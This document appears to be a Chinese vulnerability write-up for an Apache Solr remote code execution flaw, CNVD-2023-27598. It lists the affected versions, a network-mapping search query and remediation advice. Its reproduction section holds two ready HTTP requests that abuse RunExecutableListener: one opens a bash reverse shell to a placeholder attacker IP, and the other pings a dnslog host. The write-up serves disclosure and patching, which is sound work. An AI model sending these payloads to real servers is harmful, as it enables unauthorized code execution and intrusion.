2023-08-25 16:10:08 +08:00
|
|
|
|
# Apache Solr 代码执行漏洞 CNVD-2023-27598
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞描述
|
|
|
|
|
|
|
|
|
|
|
|
Solr 以 Solrcloud 模式启动且可出网时,未经身份验证的远程攻击者可以通过发送特制的数据包进行利用,最终在目标系统上远程执行任意代码。
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞影响
|
|
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
8.10.0 <= Apache Solr < 9.2.0
|
|
|
|
|
|
```
|
|
|
|
|
|
|
2023-08-28 15:55:36 +08:00
|
|
|
|
## 网络测绘
|
2023-08-25 16:10:08 +08:00
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
app="APACHE-Solr"
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞复现
|
|
|
|
|
|
|
|
|
|
|
|
使用postCommit来命令执行
|
|
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
POST /solr/demo/config HTTP/1.1
|
|
|
|
|
|
Host: 192.168.1.92:8983
|
|
|
|
|
|
Content-Length: 180
|
|
|
|
|
|
Content-Type: application/json
|
|
|
|
|
|
|
|
|
|
|
|
{"add-listener":{"event":"postCommit","name":"suiyi","class":"solr.RunExecutableListener","exe":"bash","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/your-ip/9999 0>&1"]}}
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
通过newSearcher命令执行
|
|
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
POST /solr/demo/config HTTP/1.1
|
|
|
|
|
|
Host: 192.168.1.92:8983
|
|
|
|
|
|
Content-Length: 170
|
|
|
|
|
|
Content-Type: application/json
|
|
|
|
|
|
|
|
|
|
|
|
{"add-listener":{"event":"newSearcher","name":"newSearcher3","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping -c 3 your-dnslog.dnslog.cn"]}}
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞修复
|
|
|
|
|
|
|
|
|
|
|
|
1. 如果未使用 ConfigSets API,请禁用 UPLOAD 命令,将系统属性:configset.upload.enabled 设置为 false ,详细参考:https://lucene.apache.org/solr/guide/8_6/configsets-api.html
|
|
|
|
|
|
2. 使用身份验证/授权,详细参考:https://lucene.apache.org/solr/guide/8_6/authentication-and-authorization-plugins.html
|
|
|
|
|
|
3. 官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本:
|
|
|
|
|
|
https://github.com/apache/solr/releases/tag/releases/solr/9.2.0
|